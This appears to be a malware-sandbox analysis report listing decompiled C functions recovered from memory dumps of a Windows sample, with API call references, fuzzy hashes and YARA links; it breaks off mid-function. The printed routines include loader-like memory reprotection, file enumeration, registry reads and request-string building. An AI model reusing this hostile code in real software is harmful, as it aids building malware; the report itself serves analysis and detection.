Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID: -tP
API String ID: 986138563-4025278887
Opcode ID: 90922bdd2fcbb02d14b00fa339e4135b85255c7f0862de3209b21a0468aed820
Instruction ID: ca8747ee6daebaa3d77e87877742869b64f524e0810d00e8da5f7569c062c803
Opcode Fuzzy Hash: 90922bdd2fcbb02d14b00fa339e4135b85255c7f0862de3209b21a0468aed820
Instruction Fuzzy Hash: CA31167290011AAFCB21DF69DC88C9FBB79FBC9740B144658F9159B260E632ED51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00504A3C, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00504A3C(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00504380(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x50a2d0; // 0x2add5a8
				_t4 = _t24 + 0x50bd90; // 0x2fe9338
				_t5 = _t24 + 0x50bd38; // 0x4f0053
				_t26 = E005030AD( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x50a2d0; // 0x2add5a8
						_t11 = _t32 + 0x50bd84; // 0x2fe932c
						_t48 = _t11;
						_t12 = _t32 + 0x50bd38; // 0x4f0053
						_t55 = E00504DC8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x50a2d0; // 0x2add5a8
							_t13 = _t35 + 0x50bdce; // 0x30314549
							if(E00505EC8(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x50a2b4 - 6;
								if( *0x50a2b4 <= 6) {
									_t42 =  *0x50a2d0; // 0x2add5a8
									_t15 = _t42 + 0x50bbda; // 0x52384549
									E00505EC8(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x50a2d0; // 0x2add5a8
							_t17 = _t38 + 0x50bdc8; // 0x2fe9370
							_t18 = _t38 + 0x50bda0; // 0x680043
							_t45 = E005033B7(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0x50a290, 0, _t55);
						}
					}
					HeapFree( *0x50a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00503EFA(_t54);
				}
				return _t45;
			}

0x00504a3c
0x00504a4c
0x00504a4f
0x00504a56
0x00504a58
0x00504a58
0x00504a5b
0x00504a60
0x00504a67
0x00504a74
0x00504a79
0x00504a7d
0x00504a8b
0x00504a99
0x00504a9d
0x00504b2e
0x00504b2e
0x00504aa3
0x00504aa3
0x00504aa8
0x00504aa8
0x00504aaf
0x00504abb
0x00504abd
0x00504abf
0x00504ac1
0x00504ac8
0x00504ada
0x00504adc
0x00504ae3
0x00504ae5
0x00504aec
0x00504af7
0x00504af7
0x00504ae3
0x00504afc
0x00504b01
0x00504b08
0x00504b26
0x00504b28
0x00504b28
0x00504abf
0x00504b3a
0x00504b3a
0x00504b3c
0x00504b41
0x00504b43
0x00504b43
0x00504b4e

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02FE9338,00000000,?,73BCF710,00000000,73BCF730), ref: 00504A8B
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02FE9370,?,00000000,30314549,00000014,004F0053,02FE932C), ref: 00504B28
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00501BD5), ref: 00504B3A

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5a5794c87c225c29bb49db328f176b2462c9b240bbd7e11f3c4c226975ca5e78
Instruction ID: 228924f8010da0102986307f5f6b555edf242a5eee37e0a5157f25e58c65cb50
Opcode Fuzzy Hash: 5a5794c87c225c29bb49db328f176b2462c9b240bbd7e11f3c4c226975ca5e78
Instruction Fuzzy Hash: 30316F7650020AAFDB11AB95DDC5EAEBFBCFF54700F1500A5F605A70A2D7719A08EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0050243C, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0050243C(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x50a2d0; // 0x2add5a8
				_t2 = _t22 + 0x50b671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x50a2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x50a2a4 =  *0x50a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E00503F12(_t49, _t48); // executed
					_t33 = E005045E6(_t46, _t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x50a2a4 < 5) {
							 *0x50a2a4 =  *0x50a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E00502813();
					RtlFreeHeap( *0x50a290, 0, _t48); // executed
					goto L9;
				}
				_t50 =  *0x50a390; // 0x2fe8d6c
				if(RtlAllocateHeap( *0x50a290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E00506DB7(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x0050243c
0x00502443
0x0050244a
0x0050244e
0x00502453
0x0050245e
0x0050246e
0x005024b1
0x005024b5
0x005024b9
0x005024ba
0x005024bd
0x005024c2
0x005024c2
0x005024c5
0x005024c9
0x00502503
0x00502503
0x00502509
0x00502510
0x00502510
0x005024cb
0x005024ce
0x005024d0
0x005024dd
0x005024df
0x005024e6
0x0050251d
0x00502522
0x00502524
0x00502526
0x00502526
0x00000000
0x00502524
0x005024e8
0x005024ef
0x005024fd
0x00000000
0x005024fd
0x00502470
0x0050248b
0x005024a5
0x00000000
0x005024a5
0x0050249e
0x00000000

APIs

wsprintfA.USER32 ref: 0050245E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00502483

Part of subcall function 00506DB7: GetTickCount.KERNEL32 ref: 00506DCE
Part of subcall function 00506DB7: wsprintfA.USER32 ref: 00506E1B
Part of subcall function 00506DB7: wsprintfA.USER32 ref: 00506E38
Part of subcall function 00506DB7: wsprintfA.USER32 ref: 00506E58
Part of subcall function 00506DB7: wsprintfA.USER32 ref: 00506E76
Part of subcall function 00506DB7: wsprintfA.USER32 ref: 00506E99
Part of subcall function 00506DB7: wsprintfA.USER32 ref: 00506EBA

RtlFreeHeap.NTDLL(00000000,00501C1F,?,?,00501C1F,?), ref: 005024FD

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: 48fc774df186d800ec70ec11265089be0b8601961782067bbb926bdf0f6aaa72
Instruction ID: 88f621ba094d98ae8073c8802d1213b43af1d20ea2423a5b30890ea29c56a970
Opcode Fuzzy Hash: 48fc774df186d800ec70ec11265089be0b8601961782067bbb926bdf0f6aaa72
Instruction Fuzzy Hash: 0B31297650020AEFCB11DF64DD88A9E3BBCFB58310F108022F905AB291D775A958DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C501030, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6C501030(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6c5041cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6c50103a
0x6c501047
0x6c50104d
0x6c501059
0x6c501069
0x6c50106b
0x6c501073
0x6c501108
0x6c50110f
0x00000000
0x00000000
0x00000000
0x6c501079
0x6c501079
0x6c501079
0x6c50107d
0x00000000
0x00000000
0x6c501089
0x6c50108d
0x6c5010b1
0x6c5010b5
0x6c5010c9
0x6c5010c9
0x6c5010cf
0x6c5010de
0x6c5010e2
0x6c5010ea
0x6c5010ea
0x6c5010f2
0x6c5010f5
0x6c501102
0x00000000
0x00000000
0x00000000
0x00000000
0x6c501102
0x6c5010bd
0x6c5010c1
0x6c5010c7
0x00000000
0x00000000
0x00000000
0x6c5010c7
0x6c501095
0x6c501099
0x6c5010a3
0x6c50109b
0x6c50109b
0x6c50109b
0x00000000
0x6c501099
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6C501069
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6C5010DE
GetLastError.KERNEL32 ref: 6C5010E4

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 7c7d2f11b781c2d4b79b3e056cf86dd16b38a150f007855d8da78876714f877a
Instruction ID: 63517943b2a6a055e43284a733b7e6f3ee73b2765dc0dc15e653186aac8c810e
Opcode Fuzzy Hash: 7c7d2f11b781c2d4b79b3e056cf86dd16b38a150f007855d8da78876714f877a
Instruction Fuzzy Hash: 9F214D31A01206DFCB14CF95C895AABF7F5FB0431DF008959D046D7841E3B8E699DB52

Uniqueness

Uniqueness Score: -1.00%

Function 6C5016EC, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6C5016EC() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6c5041c4);
				_push(1);
				_push( *0x6c5041d0 + 0x6c505089);
				 *0x6c5041c0 = 0xc;
				 *0x6c5041c8 = 0; // executed
				L6C5014D8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6C501112( &_v44,  &_v28,  *0x6c5041cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6c5041b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6C501979(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6c5041b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6C502112(_t40, _t30 + 4);
					}
				}
				_t23 = E6C501236(_v44); // executed
				goto L7;
			}

0x6c5016fe
0x6c5016ff
0x6c501704
0x6c50170c
0x6c50170d
0x6c501717
0x6c50171d
0x6c501726
0x6c50172b
0x6c501749
0x6c50179e
0x6c50179f
0x6c5017a0
0x6c5017a0
0x6c501751
0x6c501757
0x6c501765
0x6c501769
0x6c501770
0x6c501778
0x6c50177c
0x6c50177e
0x6c50178d
0x6c501780
0x6c501786
0x6c501786
0x6c50177e
0x6c501795
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6C5041C4,00000000), ref: 6C50171D
lstrlenW.KERNEL32(?,?,?), ref: 6C501751

Part of subcall function 6C501979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6C50176E,0000000A,?,?), ref: 6C501986
Part of subcall function 6C501979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6C50199C
Part of subcall function 6C501979: _snwprintf.NTDLL ref: 6C5019C1
Part of subcall function 6C501979: CreateFileMappingW.KERNELBASE(000000FF,6C5041C0,00000004,00000000,?,?), ref: 6C5019E6
Part of subcall function 6C501979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C50176E,0000000A,?), ref: 6C5019FD
Part of subcall function 6C501979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C50176E,0000000A), ref: 6C501A32

ExitThread.KERNEL32 ref: 6C5017A0

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 01adb9189f6c7782826e532d040a3409e86359911affecef2cf4dd03da1dec9f
Instruction ID: 8d24e4fe4f51ca322612cec04bc975ecc86be992eb016b221d544de905c470a0
Opcode Fuzzy Hash: 01adb9189f6c7782826e532d040a3409e86359911affecef2cf4dd03da1dec9f
Instruction Fuzzy Hash: CF119D72304202AFDB11DB65CC44E9B7BFCFB95718F02091AF505D7551D730E9088B96

Uniqueness

Uniqueness Score: -1.00%

Function 0050274E, Relevance: 4.6, APIs: 3, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E0050274E(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0x50a380;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E00504E9C(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E005033FA(_t19);
					if(_t20 == 0) {
						HeapFree( *0x50a290, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0x50a388; // 0x2fe9c78
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

0x00502755
0x0050275c
0x0050275f
0x00502766
0x0050276b
0x0050276d
0x00502774
0x0050277b
0x00000000
0x00000000
0x0050277d
0x00502782
0x00502783
0x0050278a
0x005027a4
0x00000000
0x0050278c
0x0050278c
0x0050278e
0x00502791
0x00502795
0x00000000
0x00000000
0x00502797
0x00502795
0x005027ae
0x005027b0
0x005027b6
0x005027b8
0x005027be
0x005027c5
0x005027d5
0x005027cd
0x005027d0
0x005027d0
0x005027d8
0x005027d8
0x005027e2
0x005027e2
0x005027aa
0x00000000

APIs

Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0050276B

Part of subcall function 00504E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3,0050A380), ref: 00504EC7
Part of subcall function 00504E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00504EE9
Part of subcall function 00504E9C: memset.NTDLL ref: 00504F03
Part of subcall function 00504E9C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00504F41
Part of subcall function 00504E9C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00504F55
Part of subcall function 00504E9C: FindCloseChangeNotification.KERNELBASE(?), ref: 00504F6C
Part of subcall function 00504E9C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00504F78
Part of subcall function 00504E9C: lstrcat.KERNEL32(?,642E2A5C), ref: 00504FB9
Part of subcall function 00504E9C: FindFirstFileA.KERNELBASE(?,?), ref: 00504FCF

Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 005027B0

Part of subcall function 005033FA: lstrlen.KERNEL32(?,0050A380,73BB7FC0,00000000,00502788,?,?,?,?,?,00503EAC,?), ref: 00503403
Part of subcall function 005033FA: mbstowcs.NTDLL ref: 0050342A
Part of subcall function 005033FA: memset.NTDLL ref: 0050343C

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00503EAC,?), ref: 005027A4

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Wow64$FileHeap$AllocateEnableFindRedirectionmemset$ChangeCloseCreateFirstFreeNotificationTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 1489712272-0
Opcode ID: 23abe13b40c81f67718427d272ca54d1877c4bb5655a0631b86722b0f44d319a
Instruction ID: 811bf52c931cd29548cbf7f17d84208d99e1fd9815d94034524dd61d77c8c0f6
Opcode Fuzzy Hash: 23abe13b40c81f67718427d272ca54d1877c4bb5655a0631b86722b0f44d319a
Instruction Fuzzy Hash: 9111007A600308EFEB009BA5CC88BEC7FB8FB44324F600026E501D60D0D3B5AE81EB21

Uniqueness

Uniqueness Score: -1.00%

Function 0050779E, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0050779E(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x50a2d0; // 0x2add5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x50ba60; // 0x4f0053
				_v16 = 4;
				_t31 = E00504C7C(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x50a2d0; // 0x2add5a8
					_t5 = _t19 + 0x50babc; // 0x6e0049
					_t34 = E00504C7C(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00502A03(_t34);
					}
					E00502A03(_t31);
				}
				return _v8;
			}

0x005077a4
0x005077a9
0x005077ae
0x005077b5
0x005077c1
0x005077c5
0x005077c7
0x005077cd
0x005077d9
0x005077dd
0x005077f0
0x005077f8
0x0050780c
0x00507814
0x00507816
0x00507816
0x0050781d
0x0050781d
0x00507824
0x00507824
0x0050782a
0x0050782f
0x00507835

APIs

Part of subcall function 00504C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,005077C1,004F0053,00000000,?), ref: 00504C85
Part of subcall function 00504C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,005077C1,004F0053,00000000,?), ref: 00504CAF
Part of subcall function 00504C7C: memset.NTDLL ref: 00504CC3

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 005077F0
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 0050780C
RegCloseKey.ADVAPI32(00000000), ref: 0050781D

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 6168a9b2ac3bf9e4f05ad8895c4310c46b550cd0ed30df5c8b2553f15b87084d
Instruction ID: 621d723fcdbc0bc68276cbb31e9d965565699f8ff5a84efe9dd891197b273972
Opcode Fuzzy Hash: 6168a9b2ac3bf9e4f05ad8895c4310c46b550cd0ed30df5c8b2553f15b87084d
Instruction Fuzzy Hash: AB111276A0020EBBEB11DBD5DC8DFAE7BBCBF44701F144055B601E6091D774AA049B51

Uniqueness

Uniqueness Score: -1.00%

Function 00501896, Relevance: 3.8, APIs: 3, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00501896(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* __ebx;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed char* _t46;
				void* _t52;
				int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t52 = __edx;
				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t54 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E00505C4E(_t54);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x50a320, 0x110);
					_t27 =  *0x50a324; // 0x0
					_t58 = _t57 + 0xc;
					if(_t27 != 0) {
						E005075D7(_t46, _a4, 0x110, _t27, 0);
					}
					if(E00504581( &_v36) != 0) {
						_t35 = E005035A1(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t56 = _v20;
							_v36 =  *_t46;
							_v16 = E0050421A(_t56, _a8, _t52, _t46, _a12);
							 *(_t56 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875fc
							memset(_t56, 0, _v12 - ( *_t20 & 0xf));
							_t58 = _t58 + 0xc;
							E00502A03(_t56);
						}
					}
					memset(_a4, 0, _t54);
					E00502A03(_a4);
				}
				return _v16;
			}

0x00501896
0x0050189c
0x005018a1
0x005018ae
0x005018b1
0x005018b4
0x005018bb
0x005018be
0x005018cc
0x005018d1
0x005018d6
0x005018db
0x005018e6
0x005018e6
0x005018f5
0x0050190a
0x00501911
0x00501918
0x0050191e
0x0050192c
0x00501932
0x00501935
0x00501942
0x00501947
0x0050194b
0x0050194b
0x00501911
0x00501956
0x00501961
0x00501961
0x0050196d

APIs

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

memcpy.NTDLL(00000000,00000110,00501C1F,00501C1F,?,?,00501C1F,?,?,005024E4,?), ref: 005018CC
memset.NTDLL ref: 00501942
memset.NTDLL ref: 00501956

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: af4041985f669a93d54903bd6f7d0107528219f9ba042576d87dea969880b8c8
Instruction ID: 2d3242c1e9bd7a1638c32f0d3a968615e8c167fb55dbeef207523f0f40a42297
Opcode Fuzzy Hash: af4041985f669a93d54903bd6f7d0107528219f9ba042576d87dea969880b8c8
Instruction Fuzzy Hash: 4C214A75A00619ABDF11AFA5CC96FEEBFB8BF48340F044425F904E6291E734DA008BA5

Uniqueness

Uniqueness Score: -1.00%

Function 005041D0, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x50a294) == 0) {
						E00501547();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x50a294) == 1) {
						_t10 = E00504430(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x005041d7
0x005041d8
0x005041db
0x0050420d
0x0050420f
0x0050420f
0x005041dd
0x005041de
0x005041f3
0x005041fa
0x005041fc
0x005041fc
0x005041fa
0x005041de
0x00504217

APIs

InterlockedIncrement.KERNEL32(0050A294), ref: 005041E5

Part of subcall function 00504430: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00504445

InterlockedDecrement.KERNEL32(0050A294), ref: 00504205

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 86f3771522d7631488a6b887b6f8059e5b81a982c49f190279ca4b5c824226fd
Instruction ID: 4068d6eefef94eeed4cc13863ea151b6c3e8bcd9e7c6d3c36ed21ec9ab559536
Opcode Fuzzy Hash: 86f3771522d7631488a6b887b6f8059e5b81a982c49f190279ca4b5c824226fd
Instruction Fuzzy Hash: A6E04F7D38422357C63137649C08BAEAE50BF71B88F484424BA49D50F6D720CC41DEE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C501C12, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6C501C12(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
